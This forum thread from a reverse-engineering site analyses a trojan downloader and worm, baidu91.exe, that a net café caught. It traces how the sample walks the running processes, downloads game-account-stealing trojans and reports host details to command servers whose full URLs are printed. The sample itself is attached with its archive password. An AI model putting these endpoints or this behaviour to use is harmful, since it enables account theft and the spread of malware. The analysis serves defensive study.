吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 42823|回复: 133
收起左侧

[PC样本分析] 网吧拦截到的一个病毒文件的详细分析报告 9月15日 此文件360免杀

  [复制链接]
战争贩子 发表于 2014-9-15 17:31
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 战争贩子 于 2014-9-15 18:05 编辑

baidu91.exe 病毒行为分析

                                                   分析人:52pojie 战争贩子
病毒信息
名称:baidu91.exe 会下载若干木马文件文件名不一
大小:36 kb
文件类型: PE 文件未加壳
病毒类型:Trojan-Downloader Trojan.Worm
360查杀:未发现木马
文件CRC:0x5D9C690B
概述
    该文件执行后会通过网络获取加密策略,并且通过该策略对指定进程进行遍历,如果发现该进程(游戏),就从指定服务器下载该进程(游戏)的木马文件并且执行。最后发送该主机的相关信息到指定的服务器的页面接口上。
详细分析
利用OD工具载入该程序,在sendrecv处下断点,发现该程序有一下封包的交互行为
1.jpg



(图1

1为程序执行之后发送的第一个请求封包。此链接的地址为:http://t.01398.com:5876/c.txt?t=1410761014&mac=080027F168EE&flag=baidu91&name=LIQUAN-FE29EC1&ver=4&os=51&hash=18e98f6603f4970170b878ff6f1bc848


2.jpg

(图2

2为第一次接收的封包,可见接收到的封包为多行字符串,意义就是某种策略。

3.jpg



(图3

3:直接运行连接的结果


继续执行代码,走出recv,下断点在程序偏移 0x1D3D处,发现ebp-0x2C变量的所指向的内容为。如图

4.jpg

(4

程序紧接着进入偏移0xB30处函数中,发现函数的调用顺序为先执行了CreateToolHelp32,紧接着调用了Process32First然后进入循环形成遍历链,条件为Process32Next返回值是否为NULL,这是个经典的遍历进程的代码。走出此函数发现,如果进程不存在则调走,如果进程存在执行下载者。如图遍历函数内容。见(图5
5.jpg



(图5


详细介绍下如果存在该进程的处理方式,如果通过修改内存使这个函数的判断为真(既存在这个进程)执行不跳转的那段代码,返现系统开始进行下载而且不同的进程下载的木马是不同的。比如说:DNF.exe下载的是一个DNF图标的进程,我分析之后发现是盗号木马。而svchost.exe(此进程一般存在)发现下载的是个驱动。见如下图DNF的下载进程情况。

6.jpg

7.jpg
8.jpg
9.jpg

(图6-9

最后无论是什么进程,程序均会往一个六合网站上发用户的主机信息等等。http://s1.01398.com:5898/r.ashx?t=1410761143&mac=080027F168EE&flag=baidu91&ip=192.168.1.106&name=LIQUAN-FE29EC1&run=init&ver=4&os=51&state=0&hash=dc65c382fa1ae3a0ed487e1398061c3f此为链接地址。

10:程序出现蠕虫病毒的现象,像全局域网的系统开始发起入侵。
10.jpg



(图10
8.jpg
(图11)

程序下载了近20多种木马,危害严重。

总结
程序为一款多功能下载者及蠕虫病毒,可以盗取游戏账号,偷取游戏装备,提升黑客在系统的权限,并且网局域网其他机器发动远程攻击(攻击模式未知,按笔者主机的情况应该是某种缓冲区溢出攻击)


baidu91.rar

13.57 KB, 下载次数: 325, 下载积分: 吾爱币 -1 CB

病毒样本 密码52pojie

文件baidu91.exe 病毒分析说明.rar

772.55 KB, 下载次数: 153, 下载积分: 吾爱币 -1 CB

点评

哈哈哈,我发给我老师了! 谢谢大大!  发表于 2014-10-30 02:21
居然有人发给了他同学。  发表于 2014-9-16 11:56
哈哈哈,我发给我同学了,哈哈哈哈哈哈哈  发表于 2014-9-15 18:48

免费评分

参与人数 9吾爱币 +2 热心值 +9 收起 理由
IT小米 + 1 + 1 用心讨论,共获提升!
idea + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
free648 + 1 向大牛学习
kanjinbao + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
lanyan1973 + 1 楼主好厉害啊
hacker1880 + 1 已经处理,感谢您对吾爱破解论坛的支持!
安静的小酒吧 + 1 想大牛学习
dalerkd + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩.
这只猪 + 1 泉哥威武!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

jqdgjj 发表于 2014-9-15 17:41
感觉不错,希望是精品程序呀。
 楼主| 战争贩子 发表于 2014-9-15 17:36
头像被屏蔽
Dormleader 发表于 2017-3-19 15:02
这病毒令我想到旗帜僵尸,看似普通,实则能呼朋引伴找来大量同伙。

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
知妇鸨 + 1 + 1 我很赞同!

查看全部评分

深拥 发表于 2014-9-16 11:56

蜗牛又来水了?
Hmily 发表于 2014-9-15 17:57
附件样本压缩包上传时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报!
 楼主| 战争贩子 发表于 2014-9-15 17:58
Hmily 发表于 2014-9-15 17:57
附件样本压缩包上传时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报!

好的 我这就改
德玛洗牙 发表于 2014-9-15 18:41
我去,好牛啊~
黄文康 发表于 2014-9-15 19:28
好厉害,,
yu_changfa 发表于 2014-9-15 19:56
大神呀!我毕业设计要做一个木马,目前努力学习中!!
赖哥 发表于 2014-9-15 21:22
诶呀妈呀大神纳。
骑乌龟的帅蜗牛 发表于 2014-9-16 10:53
好强大长见识了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 03:36

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表